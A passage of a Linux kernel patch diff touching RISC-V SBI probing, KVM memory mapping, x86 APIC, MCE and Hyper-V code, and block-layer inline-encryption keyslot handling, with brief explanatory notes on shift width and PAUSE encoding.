+@@ -27,7 +27,7 @@ const struct cpu_operations cpu_ops_spinwait = {
+ void __init cpu_set_ops(int cpuid)
+ {
+ #if IS_ENABLED(CONFIG_RISCV_SBI)
+-	if (sbi_probe_extension(SBI_EXT_HSM) > 0) {
++	if (sbi_probe_extension(SBI_EXT_HSM)) {
+ 		if (!cpuid)
+ 			pr_info("SBI HSM extension detected\n");
+ 		cpu_ops[cpuid] = &cpu_ops_sbi;
+diff --git a/arch/riscv/kernel/sbi.c b/arch/riscv/kernel/sbi.c
+index 5c87db8fdff2d..015ce8eef2de2 100644
+--- a/arch/riscv/kernel/sbi.c
++++ b/arch/riscv/kernel/sbi.c
+@@ -581,19 +581,18 @@ static void sbi_srst_power_off(void)
+  * sbi_probe_extension() - Check if an SBI extension ID is supported or not.
+  * @extid: The extension ID to be probed.
+  *
+- * Return: Extension specific nonzero value f yes, -ENOTSUPP otherwise.
++ * Return: 1 or an extension specific nonzero value if yes, 0 otherwise.
+  */
+-int sbi_probe_extension(int extid)
++long sbi_probe_extension(int extid)
+ {
+ 	struct sbiret ret;
+ 
+ 	ret = sbi_ecall(SBI_EXT_BASE, SBI_EXT_BASE_PROBE_EXT, extid,
+ 			0, 0, 0, 0, 0);
+ 	if (!ret.error)
+-		if (ret.value)
+-			return ret.value;
++		return ret.value;
+ 
+-	return -ENOTSUPP;
++	return 0;
+ }
+ EXPORT_SYMBOL(sbi_probe_extension);
+ 
+@@ -665,26 +664,26 @@ void __init sbi_init(void)
+ 	if (!sbi_spec_is_0_1()) {
+ 		pr_info("SBI implementation ID=0x%lx Version=0x%lx\n",
+ 			sbi_get_firmware_id(), sbi_get_firmware_version());
+-		if (sbi_probe_extension(SBI_EXT_TIME) > 0) {
++		if (sbi_probe_extension(SBI_EXT_TIME)) {
+ 			__sbi_set_timer = __sbi_set_timer_v02;
+ 			pr_info("SBI TIME extension detected\n");
+ 		} else {
+ 			__sbi_set_timer = __sbi_set_timer_v01;
+ 		}
+-		if (sbi_probe_extension(SBI_EXT_IPI) > 0) {
++		if (sbi_probe_extension(SBI_EXT_IPI)) {
+ 			__sbi_send_ipi	= __sbi_send_ipi_v02;
+ 			pr_info("SBI IPI extension detected\n");
+ 		} else {
+ 			__sbi_send_ipi	= __sbi_send_ipi_v01;
+ 		}
+-		if (sbi_probe_extension(SBI_EXT_RFENCE) > 0) {
++		if (sbi_probe_extension(SBI_EXT_RFENCE)) {
+ 			__sbi_rfence	= __sbi_rfence_v02;
+ 			pr_info("SBI RFENCE extension detected\n");
+ 		} else {
+ 			__sbi_rfence	= __sbi_rfence_v01;
+ 		}
+ 		if ((sbi_spec_version >= sbi_mk_version(0, 3)) &&
+-		    (sbi_probe_extension(SBI_EXT_SRST) > 0)) {
++		    sbi_probe_extension(SBI_EXT_SRST)) {
+ 			pr_info("SBI SRST extension detected\n");
+ 			pm_power_off = sbi_srst_power_off;
+ 			sbi_srst_reboot_nb.notifier_call = sbi_srst_reboot;
+diff --git a/arch/riscv/kvm/main.c b/arch/riscv/kvm/main.c
+index 58c5489d3031a..2e9b1e89c6972 100644
+--- a/arch/riscv/kvm/main.c
++++ b/arch/riscv/kvm/main.c
+@@ -84,7 +84,7 @@ int kvm_arch_init(void *opaque)
+ 		return -ENODEV;
+ 	}
+ 
+-	if (sbi_probe_extension(SBI_EXT_RFENCE) <= 0) {
++	if (!sbi_probe_extension(SBI_EXT_RFENCE)) {
+ 		kvm_info("require SBI RFENCE extension\n");
+ 		return -ENODEV;
+ 	}
+diff --git a/arch/riscv/kvm/mmu.c b/arch/riscv/kvm/mmu.c
+index 34b57e0be2ef0..d1ae0df7411ea 100644
+--- a/arch/riscv/kvm/mmu.c
++++ b/arch/riscv/kvm/mmu.c
+@@ -628,6 +628,13 @@ int kvm_riscv_gstage_map(struct kvm_vcpu *vcpu,
+ 			!(memslot->flags & KVM_MEM_READONLY)) ? true : false;
+ 	unsigned long vma_pagesize, mmu_seq;
+ 
++	/* We need minimum second+third level pages */
++	ret = kvm_mmu_topup_memory_cache(pcache, gstage_pgd_levels);
++	if (ret) {
++		kvm_err("Failed to topup G-stage cache\n");
++		return ret;
++	}
++
+ 	mmap_read_lock(current->mm);
+ 
+ 	vma = vma_lookup(current->mm, hva);
+@@ -648,6 +655,15 @@ int kvm_riscv_gstage_map(struct kvm_vcpu *vcpu,
+ 	if (vma_pagesize == PMD_SIZE || vma_pagesize == PGDIR_SIZE)
+ 		gfn = (gpa & huge_page_mask(hstate_vma(vma))) >> PAGE_SHIFT;
+ 
++	/*
++	 * Read mmu_invalidate_seq so that KVM can detect if the results of
++	 * vma_lookup() or gfn_to_pfn_prot() become stale priort to acquiring
++	 * kvm->mmu_lock.
++	 *
++	 * Rely on mmap_read_unlock() for an implicit smp_rmb(), which pairs
++	 * with the smp_wmb() in kvm_mmu_invalidate_end().
++	 */
++	mmu_seq = kvm->mmu_invalidate_seq;
+ 	mmap_read_unlock(current->mm);
+ 
+ 	if (vma_pagesize != PGDIR_SIZE &&
+@@ -657,15 +673,6 @@ int kvm_riscv_gstage_map(struct kvm_vcpu *vcpu,
+ 		return -EFAULT;
+ 	}
+ 
+-	/* We need minimum second+third level pages */
+-	ret = kvm_mmu_topup_memory_cache(pcache, gstage_pgd_levels);
+-	if (ret) {
+-		kvm_err("Failed to topup G-stage cache\n");
+-		return ret;
+-	}
+-
+-	mmu_seq = kvm->mmu_invalidate_seq;
+-
+ 	hfn = gfn_to_pfn_prot(kvm, gfn, is_write, &writable);
+ 	if (hfn == KVM_PFN_ERR_HWPOISON) {
+ 		send_sig_mceerr(BUS_MCEERR_AR, (void __user *)hva,
+diff --git a/arch/riscv/mm/init.c b/arch/riscv/mm/init.c
+index 0f14f4a8d179a..6ebb75a9a6b9f 100644
+--- a/arch/riscv/mm/init.c
++++ b/arch/riscv/mm/init.c
+@@ -843,8 +843,7 @@ static void __init create_kernel_page_table(pgd_t *pgdir, bool early)
+  * this means 2 PMD entries whereas for 32-bit kernel, this is only 1 PGDIR
+  * entry.
+  */
+-static void __init create_fdt_early_page_table(pgd_t *pgdir,
+-					       uintptr_t fix_fdt_va,
++static void __init create_fdt_early_page_table(uintptr_t fix_fdt_va,
+ 					       uintptr_t dtb_pa)
+ {
+ 	uintptr_t pa = dtb_pa & ~(PMD_SIZE - 1);
+@@ -1034,8 +1033,7 @@ asmlinkage void __init setup_vm(uintptr_t dtb_pa)
+ 	create_kernel_page_table(early_pg_dir, true);
+ 
+ 	/* Setup early mapping for FDT early scan */
+-	create_fdt_early_page_table(early_pg_dir,
+-				    __fix_to_virt(FIX_FDT), dtb_pa);
++	create_fdt_early_page_table(__fix_to_virt(FIX_FDT), dtb_pa);
+ 
+ 	/*
+ 	 * Bootime fixmap only can handle PMD_SIZE mapping. Thus, boot-ioremap
+diff --git a/arch/riscv/mm/ptdump.c b/arch/riscv/mm/ptdump.c
+index 830e7de65e3a3..20a9f991a6d74 100644
+--- a/arch/riscv/mm/ptdump.c
++++ b/arch/riscv/mm/ptdump.c
+@@ -59,10 +59,6 @@ struct ptd_mm_info {
+ };
+ 
+ enum address_markers_idx {
+-#ifdef CONFIG_KASAN
+-	KASAN_SHADOW_START_NR,
+-	KASAN_SHADOW_END_NR,
+-#endif
+ 	FIXMAP_START_NR,
+ 	FIXMAP_END_NR,
+ 	PCI_IO_START_NR,
+@@ -74,6 +70,10 @@ enum address_markers_idx {
+ 	VMALLOC_START_NR,
+ 	VMALLOC_END_NR,
+ 	PAGE_OFFSET_NR,
++#ifdef CONFIG_KASAN
++	KASAN_SHADOW_START_NR,
++	KASAN_SHADOW_END_NR,
++#endif
+ #ifdef CONFIG_64BIT
+ 	MODULES_MAPPING_NR,
+ 	KERNEL_MAPPING_NR,
+@@ -82,10 +82,6 @@ enum address_markers_idx {
+ };
+ 
+ static struct addr_marker address_markers[] = {
+-#ifdef CONFIG_KASAN
+-	{0, "Kasan shadow start"},
+-	{0, "Kasan shadow end"},
+-#endif
+ 	{0, "Fixmap start"},
+ 	{0, "Fixmap end"},
+ 	{0, "PCI I/O start"},
+@@ -97,6 +93,10 @@ static struct addr_marker address_markers[] = {
+ 	{0, "vmalloc() area"},
+ 	{0, "vmalloc() end"},
+ 	{0, "Linear mapping"},
++#ifdef CONFIG_KASAN
++	{0, "Kasan shadow start"},
++	{0, "Kasan shadow end"},
++#endif
+ #ifdef CONFIG_64BIT
+ 	{0, "Modules/BPF mapping"},
+ 	{0, "Kernel mapping"},
+@@ -362,10 +362,6 @@ static int __init ptdump_init(void)
+ {
+ 	unsigned int i, j;
+ 
+-#ifdef CONFIG_KASAN
+-	address_markers[KASAN_SHADOW_START_NR].start_address = KASAN_SHADOW_START;
+-	address_markers[KASAN_SHADOW_END_NR].start_address = KASAN_SHADOW_END;
+-#endif
+ 	address_markers[FIXMAP_START_NR].start_address = FIXADDR_START;
+ 	address_markers[FIXMAP_END_NR].start_address = FIXADDR_TOP;
+ 	address_markers[PCI_IO_START_NR].start_address = PCI_IO_START;
+@@ -377,6 +373,10 @@ static int __init ptdump_init(void)
+ 	address_markers[VMALLOC_START_NR].start_address = VMALLOC_START;
+ 	address_markers[VMALLOC_END_NR].start_address = VMALLOC_END;
+ 	address_markers[PAGE_OFFSET_NR].start_address = PAGE_OFFSET;
++#ifdef CONFIG_KASAN
++	address_markers[KASAN_SHADOW_START_NR].start_address = KASAN_SHADOW_START;
++	address_markers[KASAN_SHADOW_END_NR].start_address = KASAN_SHADOW_END;
++#endif
+ #ifdef CONFIG_64BIT
+ 	address_markers[MODULES_MAPPING_NR].start_address = MODULES_VADDR;
+ 	address_markers[KERNEL_MAPPING_NR].start_address = kernel_map.virt_addr;
+diff --git a/arch/s390/Kconfig b/arch/s390/Kconfig
+index 7fd08755a1f9e..854a6581d2f90 100644
+--- a/arch/s390/Kconfig
++++ b/arch/s390/Kconfig
+@@ -26,10 +26,6 @@ config GENERIC_BUG
+ config GENERIC_BUG_RELATIVE_POINTERS
+ 	def_bool y
+ 
+-config GENERIC_CSUM
+-	bool
+-	default y if KASAN
+-
+ config GENERIC_LOCKBREAK
+ 	def_bool y if PREEMPTION
+ 
+diff --git a/arch/s390/include/asm/checksum.h b/arch/s390/include/asm/checksum.h
+index d977a3a2f6190..1b6b992cf18ed 100644
+--- a/arch/s390/include/asm/checksum.h
++++ b/arch/s390/include/asm/checksum.h
+@@ -12,12 +12,7 @@
+ #ifndef _S390_CHECKSUM_H
+ #define _S390_CHECKSUM_H
+ 
+-#ifdef CONFIG_GENERIC_CSUM
+-
+-#include <asm-generic/checksum.h>
+-
+-#else /* CONFIG_GENERIC_CSUM */
+-
++#include <linux/kasan-checks.h>
+ #include <linux/uaccess.h>
+ #include <linux/in6.h>
+ 
+@@ -40,6 +35,7 @@ static inline __wsum csum_partial(const void *buff, int len, __wsum sum)
+ 		.odd = (unsigned long) len,
+ 	};
+ 
++	kasan_check_read(buff, len);
+ 	asm volatile(
+ 		"0:	cksm	%[sum],%[rp]\n"
+ 		"	jo	0b\n"
+@@ -135,5 +131,4 @@ static inline __sum16 csum_ipv6_magic(const struct in6_addr *saddr,
+ 	return csum_fold((__force __wsum)(sum >> 32));
+ }
+ 
+-#endif /* CONFIG_GENERIC_CSUM */
+ #endif /* _S390_CHECKSUM_H */
+diff --git a/arch/sh/kernel/cpu/sh4/sq.c b/arch/sh/kernel/cpu/sh4/sq.c
+index a76b94e41e913..8ddfe9989f5fc 100644
+--- a/arch/sh/kernel/cpu/sh4/sq.c
++++ b/arch/sh/kernel/cpu/sh4/sq.c
+@@ -382,7 +382,7 @@ static int __init sq_api_init(void)
+ 	if (unlikely(!sq_cache))
+ 		return ret;
+ 
+-	sq_bitmap = kzalloc(size, GFP_KERNEL);
++	sq_bitmap = kcalloc(size, sizeof(long), GFP_KERNEL);
+ 	if (unlikely(!sq_bitmap))
+ 		goto out;
+ 
+diff --git a/arch/x86/include/asm/intel-family.h b/arch/x86/include/asm/intel-family.h
+index cbaf174d8efd9..b3af2d45bbbb5 100644
+--- a/arch/x86/include/asm/intel-family.h
++++ b/arch/x86/include/asm/intel-family.h
+@@ -125,6 +125,8 @@
+ 
+ #define INTEL_FAM6_LUNARLAKE_M		0xBD
+ 
++#define INTEL_FAM6_ARROWLAKE		0xC6
++
+ /* "Small Core" Processors (Atom/E-Core) */
+ 
+ #define INTEL_FAM6_ATOM_BONNELL		0x1C /* Diamondville, Pineview */
+diff --git a/arch/x86/kernel/apic/apic.c b/arch/x86/kernel/apic/apic.c
+index 20d9a604da7c4..7705571100518 100644
+--- a/arch/x86/kernel/apic/apic.c
++++ b/arch/x86/kernel/apic/apic.c
+@@ -422,10 +422,9 @@ static unsigned int reserve_eilvt_offset(int offset, unsigned int new)
+ 		if (vector && !eilvt_entry_is_changeable(vector, new))
+ 			/* may not change if vectors are different */
+ 			return rsvd;
+-		rsvd = atomic_cmpxchg(&eilvt_offsets[offset], rsvd, new);
+-	} while (rsvd != new);
++	} while (!atomic_try_cmpxchg(&eilvt_offsets[offset], &rsvd, new));
+ 
+-	rsvd &= ~APIC_EILVT_MASKED;
++	rsvd = new & ~APIC_EILVT_MASKED;
+ 	if (rsvd && rsvd != vector)
+ 		pr_info("LVT offset %d assigned for vector 0x%02x\n",
+ 			offset, rsvd);
+diff --git a/arch/x86/kernel/apic/io_apic.c b/arch/x86/kernel/apic/io_apic.c
+index a868b76cd3d42..efa87b6bb1cde 100644
+--- a/arch/x86/kernel/apic/io_apic.c
++++ b/arch/x86/kernel/apic/io_apic.c
+@@ -2480,17 +2480,21 @@ static int io_apic_get_redir_entries(int ioapic)
+ 
+ unsigned int arch_dynirq_lower_bound(unsigned int from)
+ {
++	unsigned int ret;
++
+ 	/*
+ 	 * dmar_alloc_hwirq() may be called before setup_IO_APIC(), so use
+ 	 * gsi_top if ioapic_dynirq_base hasn't been initialized yet.
+ 	 */
+-	if (!ioapic_initialized)
+-		return gsi_top;
++	ret = ioapic_dynirq_base ? : gsi_top;
++
+ 	/*
+-	 * For DT enabled machines ioapic_dynirq_base is irrelevant and not
+-	 * updated. So simply return @from if ioapic_dynirq_base == 0.
++	 * For DT enabled machines ioapic_dynirq_base is irrelevant and
++	 * always 0. gsi_top can be 0 if there is no IO/APIC registered.
++	 * 0 is an invalid interrupt number for dynamic allocations. Return
++	 * @from instead.
+ 	 */
+-	return ioapic_dynirq_base ? : from;
++	return ret ? : from;
+ }
+ 
+ #ifdef CONFIG_X86_32
+diff --git a/arch/x86/kernel/cpu/mce/amd.c b/arch/x86/kernel/cpu/mce/amd.c
+index 10fb5b5c9efa4..5518272061bfb 100644
+--- a/arch/x86/kernel/cpu/mce/amd.c
++++ b/arch/x86/kernel/cpu/mce/amd.c
+@@ -235,10 +235,10 @@ static DEFINE_PER_CPU(struct threshold_bank **, threshold_banks);
+  * A list of the banks enabled on each logical CPU. Controls which respective
+  * descriptors to initialize later in mce_threshold_create_device().
+  */
+-static DEFINE_PER_CPU(unsigned int, bank_map);
++static DEFINE_PER_CPU(u64, bank_map);
+ 
+ /* Map of banks that have more than MCA_MISC0 available. */
+-static DEFINE_PER_CPU(u32, smca_misc_banks_map);
++static DEFINE_PER_CPU(u64, smca_misc_banks_map);
+ 
+ static void amd_threshold_interrupt(void);
+ static void amd_deferred_error_interrupt(void);
+@@ -267,7 +267,7 @@ static void smca_set_misc_banks_map(unsigned int bank, unsigned int cpu)
+ 		return;
+ 
+ 	if (low & MASK_BLKPTR_LO)
+-		per_cpu(smca_misc_banks_map, cpu) |= BIT(bank);
++		per_cpu(smca_misc_banks_map, cpu) |= BIT_ULL(bank);
+ 
+ }
+ 
+@@ -528,7 +528,7 @@ static u32 smca_get_block_address(unsigned int bank, unsigned int block,
+ 	if (!block)
+ 		return MSR_AMD64_SMCA_MCx_MISC(bank);
+ 
+-	if (!(per_cpu(smca_misc_banks_map, cpu) & BIT(bank)))
++	if (!(per_cpu(smca_misc_banks_map, cpu) & BIT_ULL(bank)))
+ 		return 0;
+ 
+ 	return MSR_AMD64_SMCA_MCx_MISCy(bank, block - 1);
+@@ -572,7 +572,7 @@ prepare_threshold_block(unsigned int bank, unsigned int block, u32 addr,
+ 	int new;
+ 
+ 	if (!block)
+-		per_cpu(bank_map, cpu) |= (1 << bank);
++		per_cpu(bank_map, cpu) |= BIT_ULL(bank);
+ 
+ 	memset(&b, 0, sizeof(b));
+ 	b.cpu			= cpu;
+@@ -884,7 +884,7 @@ static void amd_threshold_interrupt(void)
+ 		return;
+ 
+ 	for (bank = 0; bank < this_cpu_read(mce_num_banks); ++bank) {
+-		if (!(per_cpu(bank_map, cpu) & (1 << bank)))
++		if (!(per_cpu(bank_map, cpu) & BIT_ULL(bank)))
+ 			continue;
+ 
+ 		first_block = bp[bank]->blocks;
+@@ -1362,7 +1362,7 @@ int mce_threshold_create_device(unsigned int cpu)
+ 		return -ENOMEM;
+ 
+ 	for (bank = 0; bank < numbanks; ++bank) {
+-		if (!(this_cpu_read(bank_map) & (1 << bank)))
++		if (!(this_cpu_read(bank_map) & BIT_ULL(bank)))
+ 			continue;
+ 		err = threshold_create_bank(bp, cpu, bank);
+ 		if (err) {
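
The mce/amd.c hunks are all about shift width: with a 32-bit map,
"1 << bank" is undefined once bank reaches 32, yet SMCA systems can
expose more than 32 banks; BIT_ULL() shifts a 1ULL and keeps the full
64-bit map usable. A standalone illustration, not kernel code, with a
hypothetical bank index:

#include <stdio.h>

int main(void)
{
        unsigned int bank = 33;         /* SMCA can exceed 32 banks */

        /* A 32-bit shift by 33 is undefined behaviour; on x86 it
         * typically wraps and sets bit 1 instead of bit 33. The mask
         * below only keeps this demo itself well defined. */
        unsigned long long wrong = 1u << (bank & 31);
        unsigned long long right = 1ULL << bank; /* ~ BIT_ULL(bank) */

        printf("wrong=%#llx right=%#llx\n", wrong, right);
        return 0;
}
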
+diff --git a/arch/x86/kernel/cpu/mshyperv.c b/arch/x86/kernel/cpu/mshyperv.c
+index 46668e2554210..1ce228dc267ae 100644
+--- a/arch/x86/kernel/cpu/mshyperv.c
++++ b/arch/x86/kernel/cpu/mshyperv.c
+@@ -291,12 +291,16 @@ static void __init ms_hyperv_init_platform(void)
+ 	 * To mirror what Windows does we should extract CPU management
+ 	 * features and use the ReservedIdentityBit to detect if Linux is the
+ 	 * root partition. But that requires negotiating CPU management
+-	 * interface (a process to be finalized).
++	 * interface (a process to be finalized). For now, use the privilege
++	 * flag as the indicator for running as root.
+ 	 *
+-	 * For now, use the privilege flag as the indicator for running as
+-	 * root.
++	 * Hyper-V should never specify running as root and as a Confidential
++	 * VM. But to protect against a compromised/malicious Hyper-V trying
++	 * to exploit root behavior to expose Confidential VM memory, ignore
++	 * the root partition setting if also a Confidential VM.
+ 	 */
+-	if (cpuid_ebx(HYPERV_CPUID_FEATURES) & HV_CPU_MANAGEMENT) {
++	if ((ms_hyperv.priv_high & HV_CPU_MANAGEMENT) &&
++	    !(ms_hyperv.priv_high & HV_ISOLATION)) {
+ 		hv_root_partition = true;
+ 		pr_info("Hyper-V: running as root partition\n");
+ 	}
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index cb547a0833812..53034045cb6e6 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -7749,9 +7749,11 @@ static u64 vmx_get_perf_capabilities(void)
+ 	if (boot_cpu_has(X86_FEATURE_PDCM))
+ 		rdmsrl(MSR_IA32_PERF_CAPABILITIES, host_perf_cap);
+ 
+-	x86_perf_get_lbr(&lbr);
+-	if (lbr.nr)
+-		perf_cap |= host_perf_cap & PMU_CAP_LBR_FMT;
++	if (!cpu_feature_enabled(X86_FEATURE_ARCH_LBR)) {
++		x86_perf_get_lbr(&lbr);
++		if (lbr.nr)
++			perf_cap |= host_perf_cap & PMU_CAP_LBR_FMT;
++	}
+ 
+ 	if (vmx_pebs_supported()) {
+ 		perf_cap |= host_perf_cap & PERF_CAP_PEBS_MASK;
+@@ -7891,6 +7893,21 @@ static int vmx_check_intercept(struct kvm_vcpu *vcpu,
+ 		/* FIXME: produce nested vmexit and return X86EMUL_INTERCEPTED.  */
+ 		break;
+ 
++	case x86_intercept_pause:
++		/*
++		 * PAUSE is a single-byte NOP with a REPE prefix, i.e. collides
++		 * with vanilla NOPs in the emulator.  Apply the interception
++		 * check only to actual PAUSE instructions.  Don't check
++		 * PAUSE-loop-exiting, software can't expect a given PAUSE to
++		 * exit, i.e. KVM is within its rights to allow L2 to execute
++		 * the PAUSE.
++		 */
++		if ((info->rep_prefix != REPE_PREFIX) ||
++		    !nested_cpu_has2(vmcs12, CPU_BASED_PAUSE_EXITING))
++			return X86EMUL_CONTINUE;
++
++		break;
++
+ 	/* TODO: check more intercepts... */
+ 	default:
+ 		break;
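
The new PAUSE case works because of how the instruction is encoded:
PAUSE is F3 90, a one-byte NOP (90) carrying a REPE prefix (F3), so
testing the decoded rep prefix is what separates a real PAUSE from the
plain NOPs the emulator also sees. A hedged byte-level restatement, not
KVM code (helper name hypothetical):

/* PAUSE = REPE (0xf3) + NOP (0x90); a bare 0x90 is a plain NOP and
 * must not be treated as an interceptable PAUSE. */
static int insn_is_pause(const unsigned char *insn, unsigned int len)
{
        return len >= 2 && insn[0] == 0xf3 && insn[1] == 0x90;
}
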
+diff --git a/block/blk-crypto-internal.h b/block/blk-crypto-internal.h
+index a8cdaf26851e1..4f1de2495f0c3 100644
+--- a/block/blk-crypto-internal.h
++++ b/block/blk-crypto-internal.h
+@@ -65,6 +65,11 @@ static inline bool blk_crypto_rq_is_encrypted(struct request *rq)
+ 	return rq->crypt_ctx;
+ }
+ 
++static inline bool blk_crypto_rq_has_keyslot(struct request *rq)
++{
++	return rq->crypt_keyslot;
++}
++
+ blk_status_t blk_crypto_get_keyslot(struct blk_crypto_profile *profile,
+ 				    const struct blk_crypto_key *key,
+ 				    struct blk_crypto_keyslot **slot_ptr);
+@@ -119,6 +124,11 @@ static inline bool blk_crypto_rq_is_encrypted(struct request *rq)
+ 	return false;
+ }
+ 
++static inline bool blk_crypto_rq_has_keyslot(struct request *rq)
++{
++	return false;
++}
++
+ #endif /* CONFIG_BLK_INLINE_ENCRYPTION */
+ 
+ void __bio_crypt_advance(struct bio *bio, unsigned int bytes);
+@@ -153,14 +163,21 @@ static inline bool blk_crypto_bio_prep(struct bio **bio_ptr)
+ 	return true;
+ }
+ 
+-blk_status_t __blk_crypto_init_request(struct request *rq);
+-static inline blk_status_t blk_crypto_init_request(struct request *rq)
++blk_status_t __blk_crypto_rq_get_keyslot(struct request *rq);
++static inline blk_status_t blk_crypto_rq_get_keyslot(struct request *rq)
+ {
+ 	if (blk_crypto_rq_is_encrypted(rq))
+-		return __blk_crypto_init_request(rq);
++		return __blk_crypto_rq_get_keyslot(rq);
+ 	return BLK_STS_OK;
+ }
+ 
++void __blk_crypto_rq_put_keyslot(struct request *rq);
++static inline void blk_crypto_rq_put_keyslot(struct request *rq)
++{
++	if (blk_crypto_rq_has_keyslot(rq))
++		__blk_crypto_rq_put_keyslot(rq);
++}
++
+ void __blk_crypto_free_request(struct request *rq);
+ static inline void blk_crypto_free_request(struct request *rq)
+ {
+@@ -199,7 +216,7 @@ static inline blk_status_t blk_crypto_insert_cloned_request(struct request *rq)
+ {
+ 
+ 	if (blk_crypto_rq_is_encrypted(rq))
+-		return blk_crypto_init_request(rq);
++		return blk_crypto_rq_get_keyslot(rq);
+ 	return BLK_STS_OK;
+ }
+ 
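
The header half of the refactor keeps the cheap presence test inline, so
the common unencrypted request pays one load and one branch, and only
encrypted requests take the out-of-line call; the new put side mirrors
the existing get side. The idiom in isolation, not part of the patch
(all names hypothetical):

struct obj {
        void *resource;
};

void __resource_put(struct obj *o);     /* out-of-line slow path */

/* Header-style inline fast path, the shape of the new
 * blk_crypto_rq_put_keyslot() wrapper above. */
static inline void resource_put(struct obj *o)
{
        if (o->resource)                /* common case: nothing held */
                __resource_put(o);
}
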
+diff --git a/block/blk-crypto-profile.c b/block/blk-crypto-profile.c
+index 0307fb0d95d34..3290c03c9918d 100644
+--- a/block/blk-crypto-profile.c
++++ b/block/blk-crypto-profile.c
+@@ -354,28 +354,16 @@ bool __blk_crypto_cfg_supported(struct blk_crypto_profile *profile,
+ 	return true;
+ }
+ 
+-/**
+- * __blk_crypto_evict_key() - Evict a key from a device.
+- * @profile: the crypto profile of the device
+- * @key: the key to evict.  It must not still be used in any I/O.
+- *
+- * If the device has keyslots, this finds the keyslot (if any) that contains the
+- * specified key and calls the driver's keyslot_evict function to evict it.
+- *
+- * Otherwise, this just calls the driver's keyslot_evict function if it is
+- * implemented, passing just the key (without any particular keyslot).  This
+- * allows layered devices to evict the key from their underlying devices.
+- *
+- * Context: Process context. Takes and releases profile->lock.
+- * Return: 0 on success or if there's no keyslot with the specified key, -EBUSY
+- *	   if the keyslot is still in use, or another -errno value on other
+- *	   error.
++/*
++ * This is an internal function that evicts a key from an inline encryption
++ * device that can be either a real device or the blk-crypto-fallback "device".
++ * It is used only by blk_crypto_evict_key(); see that function for details.
+  */
+ int __blk_crypto_evict_key(struct blk_crypto_profile *profile,
+ 			   const struct blk_crypto_key *key)
+ {
+ 	struct blk_crypto_keyslot *slot;
+-	int err = 0;
++	int err;
+ 
+ 	if (profile->num_slots == 0) {
+ 		if (profile->ll_ops.keyslot_evict) {
+@@ -389,22 +377,30 @@ int __blk_crypto_evict_key(struct blk_crypto_profile *profile,
+ 
+ 	blk_crypto_hw_enter(profile);
+ 	slot = blk_crypto_find_keyslot(profile, key);
+-	if (!slot)
+-		goto out_unlock;
++	if (!slot) {
++		/*
++		 * Not an error, since a key not in use by I/O is not guaranteed
++		 * to be in a keyslot.  There can be more keys than keyslots.
++		 */
++		err = 0;
++		goto out;
++	}
+ 
+ 	if (WARN_ON_ONCE(atomic_read(&slot->slot_refs) != 0)) {
++		/* BUG: key is still in use by I/O */
+ 		err = -EBUSY;
+-		goto out_unlock;
++		goto out_remove;
+ 	}
+ 	err = profile->ll_ops.keyslot_evict(profile, key,
+ 					    blk_crypto_keyslot_index(slot));
+-	if (err)
+-		goto out_unlock;
+-
++out_remove:
++	/*
++	 * Callers free the key even on error, so unlink the key from the hash
++	 * table and clear slot->key even on error.
++	 */
+ 	hlist_del(&slot->hash_node);
+ 	slot->key = NULL;
+-	err = 0;
+-out_unlock:
++out:
+ 	blk_crypto_hw_exit(profile);
+ 	return err;
+ }
+diff --git a/block/blk-crypto.c b/block/blk-crypto.c
+index 45378586151f7..4d760b092deb9 100644
+--- a/block/blk-crypto.c
++++ b/block/blk-crypto.c
+@@ -13,6 +13,7 @@
+ #include <linux/blkdev.h>
+ #include <linux/blk-crypto-profile.h>
+ #include <linux/module.h>
++#include <linux/ratelimit.h>
+ #include <linux/slab.h>
+ 
+ #include "blk-crypto-internal.h"
+@@ -224,27 +225,27 @@ static bool bio_crypt_check_alignment(struct bio *bio)
+ 	return true;
+ }
+ 
+-blk_status_t __blk_crypto_init_request(struct request *rq)
++blk_status_t __blk_crypto_rq_get_keyslot(struct request *rq)
+ {
+ 	return blk_crypto_get_keyslot(rq->q->crypto_profile,
+ 				      rq->crypt_ctx->bc_key,
+ 				      &rq->crypt_keyslot);
+ }
+ 
+-/**
+- * __blk_crypto_free_request - Uninitialize the crypto fields of a request.
+- *
+- * @rq: The request whose crypto fields to uninitialize.
+- *
+- * Completely uninitializes the crypto fields of a request. If a keyslot has
+- * been programmed into some inline encryption hardware, that keyslot is
+- * released. The rq->crypt_ctx is also freed.
+- */
+-void __blk_crypto_free_request(struct request *rq)
++void __blk_crypto_rq_put_keyslot(struct request *rq)
+ {
+ 	blk_crypto_put_keyslot(rq->crypt_keyslot);
++	rq->crypt_keyslot = NULL;
++}
++
++void __blk_crypto_free_request(struct request *rq)
++{
++	/* The keyslot, if one was needed, should have been released earlier. */
++	if (WARN_ON_ONCE(rq->crypt_keyslot))
++		__blk_crypto_rq_put_keyslot(rq);
++
+ 	mempool_free(rq->crypt_ctx, bio_crypt_ctx_pool);
+-	blk_crypto_rq_set_defaults(rq);
++	rq->crypt_ctx = NULL;
+ }
+ 
+ /**
+@@ -399,30 +400,39 @@ int blk_crypto_start_using_key(struct block_device *bdev,
+ }
+ 
+ /**
+- * blk_crypto_evict_key() - Evict a key from any inline encryption hardware
+- *			    it may have been programmed into
+- * @bdev: The block_device who's associated inline encryption hardware this key
+- *     might have been programmed into
+- * @key: The key to evict
++ * blk_crypto_evict_key() - Evict a blk_crypto_key from a block_device
++ * @bdev: a block_device on which I/O using the key may have been done
++ * @key: the key to evict
++ *
++ * For a given block_device, this function removes the given blk_crypto_key from
++ * the keyslot management structures and evicts it from any underlying hardware
++ * keyslot(s) or blk-crypto-fallback keyslot it may have been programmed into.
+  *
+- * Upper layers (filesystems) must call this function to ensure that a key is
+- * evicted from any hardware that it might have been programmed into.  The key
+- * must not be in use by any in-flight IO when this function is called.
++ * Upper layers must call this before freeing the blk_crypto_key.  It must be
++ * called for every block_device the key may have been used on.  The key must no
++ * longer be in use by any I/O when this function is called.
+  *
+- * Return: 0 on success or if the key wasn't in any keyslot; -errno on error.
++ * Context: May sleep.
+  */
+-int blk_crypto_evict_key(struct block_device *bdev,
+-			 const struct blk_crypto_key *key)
++void blk_crypto_evict_key(struct block_device *bdev,
++			  const struct blk_crypto_key *key)
+ {
+ 	struct request_queue *q = bdev_get_queue(bdev);
++	int err;
+ 
+ 	if (blk_crypto_config_supported_natively(bdev, &key->crypto_cfg))
+-		return __blk_crypto_evict_key(q->crypto_profile, key);
+-
++		err = __blk_crypto_evict_key(q->crypto_profile, key);
++	else
++		err = blk_crypto_fallback_evict_key(key);
+ 	/*
+-	 * If the block_device didn't support the key, then blk-crypto-fallback
